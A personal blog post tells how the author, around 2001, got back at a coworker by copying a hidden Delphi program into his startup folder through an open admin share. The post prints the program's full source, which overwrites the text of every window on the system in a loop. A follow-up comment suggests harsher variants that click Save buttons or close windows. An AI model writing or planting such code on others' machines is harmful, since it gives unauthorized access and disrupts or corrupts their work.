Quack quack: A somewhat malicious program I wrote many years ago

I was reading The Daily WTF earlier, and came across this image, which reminded me of something…

Pic-8_cropped

I think it’s an amusing story, at least it is to me, so I tracked down a program I wrote many years ago, to share it now, but first, here’s the story…

It was many years ago, around 2001, I think, and I had just started working at a place called Old Mutual, the Unit Trusts department in Cape Town. I was young, innocent and idealistic, with perhaps a teeny weeny mean streak. Where I’d worked before, it was perfectly safe to get up from your desk, whether you were going for coffee, or lunch, or whatever, and leave your workstation unlocked. It was perfectly safe, because we all trusted each other.

But poor little innocent me did not suspect what might happen at the new job. I left my workstation open for just ten minutes, and upon my return discovered that somebody had taken it upon himself to teach me a lesson. You see, these people took security seriously, so when I was away, Mr. Gundi Joubert (and I’m writing his name because I will share this with him on Facebook) decided to do me a favour, and show just how harmful it could be to leave your workstation open.

He’d changed my settings on my Windows NT4 machine to use the truly hideous high contrast scheme, changed my fonts to the largest that was allowed, and set my screen resolution to 640×480. I was pissed off. Unfortunately for Gundi, he didn’t realize how unsecure his NT4 machine really was, but I did.

You see, I knew that all I needed to do was copy a program into his local user startup folder via the default C$ open share on his machine. What the malicious program did was limited only by my imagination (of a consequence that was not truly harmful but very annoying) and by the time and energy I was willing to put into my revenge. But I think my achievement was pretty damn annoying for only five minutes of work.

What the quack quack (Delphi) program does is fairly simple:

  1. It runs in a hidden window, which then assigns a variable, appropriately named havoc, to a TThread-derived class. (Delphi’s way of wrapping Win32 API threads in a strong type.)
  2. The TWindowTextReplacer thread then runs in an infinite loop, between sleeping for roughly one second.
  3. It works by enumerating all windows, then enumerating all the child windows of every window, sending them all a WM_SETTEXT message, with the value “Quack Quack”.
  4. The end result: The text of every text control and every button in the system, as well as any other window control that might accept the message (which is most of them in NT4) is set to Quack Quack.

The poor bastard didn’t know what to do, and wasn’t amused when I told him that all he needed to do was open the Task Manager, go to the Quack Quack tab, select the correct Quack Quack process, press the correct Quack Quack button, and when prompted with the confirmation dialog’s Quack Quack message, press the correct Quack Quack button there too…

I recall that I did later expand that program with a second version that also set the user wallpaper to a tiled 32×32 image of Daffy Duck, but that source code was lost a long time ago. Maybe I should port this to C#, just for fun, but not today.

Please note that I do not condone writing malicious programs, unless they are used against people who really deserve them

Download the Quack Quack source code here.

Here’s the source of the malicious thread… Though I don’t have any way of compiling Delphi code anymore… This is the only source of the program that does anything. The hidden window just creates an instance of the thread class, and sets it on it’s merry way.

unit TextReplacer;

interface

uses
  Classes, Forms;

type
  TWindowTextReplacer = class(TThread)
  private
    { Private declarations }
  protected
    procedure Execute; override;
  public
    constructor Create;
  end;

implementation

uses
  Windows, SysUtils;

{ Remove Messages from uses list }
const
  WM_SETTEXT = $000C;
  WM_SETICON = $0080;

{ Type to use as the user-defined parameter in the enumwindows callback fuctions. }
type
  PHWND = ^HWND;

procedure QuackQuack(Hwnd: THandle);
var
  sTemp: String;
begin
  sTemp := 'Quack Quack';
  SendMessage(Hwnd, WM_SETTEXT, Length(sTemp), Longint(sTemp));
end;

{ Callback function for EnumChildWindows }
function EnumChildProc(Hwnd: THandle; FoundWnd: PHWND): Bool; stdcall;
begin
  Result := True;
  QuackQuack(Hwnd);
end;

{ Callback function for EnumWindows }
function EnumWndProc(Hwnd: THandle; FoundWnd: PHWND): Bool; stdcall;
begin
  Result := True;
  FoundWnd^ := Hwnd;
  QuackQuack(Hwnd);
  SendMessage(Hwnd, WM_SETICON, ICON_SMALL, Application.Icon.Handle);
  EnumChildWindows(Hwnd, @EnumChildProc, Longint(Hwnd));
end;

{ TWindowTextReplacer }

constructor TWindowTextReplacer.Create;
begin
  FreeOnTerminate := True;
  inherited Create(False);
end;

procedure TWindowTextReplacer.Execute;
var
  WindowHandle: THandle;
  i: Byte;
begin
  while not Terminated do
  begin
    EnumWindows(@EnumWndProc, Longint(@WindowHandle));
    // not actually using WindowHandle, but could use it at this point

    // Prevent 100% CPU use and pause for roughly a second.
    // Allow window's preemptive multithreading to give process time to other threads...
    i := 0;
    while (not Terminated) and (i < 100) do
    begin
      Sleep(10);
      Inc(i);
    end;
  end;
end;

end.
Advertisements

About Jerome

I am a senior C# developer in Johannesburg, South Africa. I am also a recovering addict, who spent nearly eight years using methamphetamine. I write on my recovery blog about my lessons learned and sometimes give advice to others who have made similar mistakes, often from my viewpoint as an atheist, and I also write some C# programming articles on my programming blog.
This entry was posted in Programming and tagged , , , . Bookmark the permalink.

One Response to Quack quack: A somewhat malicious program I wrote many years ago

  1. Jerome says:

    Maybe it should be worthwhile adding this in case it is not obvious to all…

    There is of course plenty more chaos that can be caused by mucking with Windows messages alone. In the example given, I didn’t want to do too much harm, but rather cause obvious chaos. A more subtle affect would be to, for example, look at the child window’s class names or existing text, and then send all OK buttons a WM_CLOSE message. Windows are generally very obedient animals; if you tell them to go away, they obey. Thus you could make all OK buttons disappear. Or you could click them. You could close all the parent windows. You could set all text to something, and then click all save buttons. Etc.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s